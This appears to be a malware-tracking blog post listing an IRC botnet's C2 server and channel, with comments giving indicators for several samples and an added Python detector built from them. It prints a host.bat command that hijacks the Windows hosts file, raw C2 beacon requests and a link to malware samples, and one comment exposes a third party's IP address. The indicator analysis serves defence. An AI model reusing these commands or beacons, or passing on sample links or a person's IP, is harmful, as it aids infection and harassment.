were.hacked.jp(irc botnet hosted in France Roubaix Ovh Systems)

Thanks to the anonymous guy in this post for the sample

Resolved : [were.hacked.jp] To [176.31.123.56]

Server: 176.31.123.56:8782
Server Password:
Username: __x00
Nickname: {x00-00-DEU-XP-DELL-9640}
Channel: ###x00### (Password: )
Channeltopic: :.ban |.scan sshspreadscan 120 7 0 41.x.x.x

sample here

hosting info:
http://whois.domaintools.com/176.31.123.56


15 Comments

Anonymous - May 6, 2013 at 9:26 pm

Here's the "anonymous guy" ip: 190.141.136.71, he's being ddosed for a month.

Anonymous - May 7, 2013 at 4:31 am

Hello pig, just wondering where do you get your malware from?

Where do you search?

Pig - May 7, 2013 at 3:52 pm

1 month ddos for panama ip ? u must be raged to death lool

Anonymous - May 7, 2013 at 7:35 pm

the sample is deleted can you upload again

Anonymous - May 8, 2013 at 3:19 am

Anonymous - May 8, 2013 at 12:32 pm

http://www.sendspace.com/file/w8lb9m

samples_for_pig

http bot i think communicates to random shitted domains.
kinda advanced i think 😀

Anonymous - May 8, 2013 at 2:27 pm

Pig - May 8, 2013 at 4:26 pm

txx.exe connects here: hxxp://71.236.243.21:3128/G@t3/1nPu7.php

POST /G@t3/1nPu7.php HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.2)
Host: 71.236.243.21:3128
Content-Length: 263
Connection: Keep-Alive
Cache-Control: no-cache


Download URLs
hxxp://71.236.243.21/G@t3/j.bin they're not active now
Outgoing connection to remote server: 71.236.243.21 TCP port 3128

Pig - May 8, 2013 at 4:35 pm

helpxx.exe is a sfx archive with 2 files inside host.bat and winhelp.exe

host.bat: echo 212.114.160.122 inf0nix.com >> %SystemRoot%\system32\drivers\etc\hosts
winhelp.exe: connects to hxxp://inf0nix.com/notify.php

Pig - May 8, 2013 at 4:55 pm

this is the domain name for fU1.exe: files.g00n.pl. The rest are random domain names created by the malware, like this: http://www.bpfq02.com/www.inform1ongung.info

the http query is this: files.g00n.pl/dev/ip.php
this is the mutex name for this malware: _kuku_joker_v4.00

Pig - May 8, 2013 at 5:05 pm

fsvchost.exe does this: Copies self to other locations
Creates files in windows system directory
Creates system services or drivers
Loads system drivers

Mutex created still same: _kuku_joker_v4.00

HTTP Queries: inf1nix.com GET /notify.php HTTP/1.1
http://www.bpfq02.com GET /t_100_v400/?rnd=247500&id=23104616288 HTTP/1.1
http://www.inform1ongung.info GET /t_100_v400/?rnd=252937&id=23104616288 HTTP/1.1

this is the malware version: User-Agent: KUKU v4.00 alpha

malware disables safeboot

new domain name here: inf1nix.com
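Added example (not from the post or the commenters): a small Python detector built only from the indicators quoted in the comments above, the KUKU v4.00 User-Agent, the /t_100_v400/?rnd=..&id=.. beacon URI, the /G@t3/ gate POST, and the hosts-file entry that host.bat appends for inf0nix.com. The raw HTTP requests and the hosts-file text are constructed sample inputs modelled on what the comments show.

```python
import re

# Indicators taken from the comments above (KUKU v4.00 beacon, inf0nix hosts entry, G@t3 gate).
KUKU_UA = "KUKU v4.00 alpha"
BEACON_PATH = re.compile(r"^/t_100_v400/\?rnd=\d+&id=\d+$")
GATE_PATH = re.compile(r"^/G@t3/", re.IGNORECASE)
HOSTS_IOC = {"inf0nix.com", "inf1nix.com"}


def parse_request(raw):
    """Split a raw HTTP request (request line + headers) into method, path, headers."""
    lines = raw.strip().splitlines()
    method, path, _ = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        if ":" in line:
            k, v = line.split(":", 1)
            headers[k.strip().lower()] = v.strip()
    return method, path, headers


def classify_request(raw):
    """Return the indicator names matched by one HTTP request (empty list if none)."""
    method, path, headers = parse_request(raw)
    hits = []
    if headers.get("user-agent", "") == KUKU_UA:
        hits.append("kuku-user-agent")
    if BEACON_PATH.match(path):
        hits.append("kuku-beacon-uri")
    if path == "/notify.php" and headers.get("host", "") in HOSTS_IOC:
        hits.append("inf0nix-notify")
    if method == "POST" and GATE_PATH.match(path):
        hits.append("g@t3-gate-post")
    return hits


def hosts_file_hijacks(hosts_text):
    """Flag hosts-file lines that pin a known C2 domain to an address (what host.bat does)."""
    flagged = []
    for line in hosts_text.splitlines():
        parts = line.split("#", 1)[0].split()  # drop comments, then split on whitespace
        if len(parts) >= 2 and any(n.lower() in HOSTS_IOC for n in parts[1:]):
            flagged.append((parts[0], parts[1]))
    return flagged


# Constructed sample inputs modelled on the requests quoted in the comments.
SAMPLE_BEACON = "GET /t_100_v400/?rnd=247500&id=23104616288 HTTP/1.1\r\nHost: www.bpfq02.com\r\nUser-Agent: KUKU v4.00 alpha\r\n"
SAMPLE_GATE = "POST /G@t3/1nPu7.php HTTP/1.1\r\nHost: 71.236.243.21:3128\r\nUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.2)\r\n"
SAMPLE_BENIGN = "GET /index.html HTTP/1.1\r\nHost: example.com\r\nUser-Agent: Mozilla/5.0\r\n"
SAMPLE_HOSTS = "127.0.0.1 localhost\n212.114.160.122 inf0nix.com\n"
```

Running classify_request over each sample returns the matched indicator names, and hosts_file_hijacks over SAMPLE_HOSTS returns the pinned inf0nix.com entry; feed real proxy logs or a host's hosts file through the same two functions to triage.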

Pig - May 8, 2013 at 5:09 pm

svchost-x.exe is same shit as txx.exe

Pig - May 8, 2013 at 5:09 pm

thank you for your submissions 🙂

Anonymous - May 8, 2013 at 5:29 pm

what is this bot btw?

Anonymous - May 8, 2013 at 6:51 pm
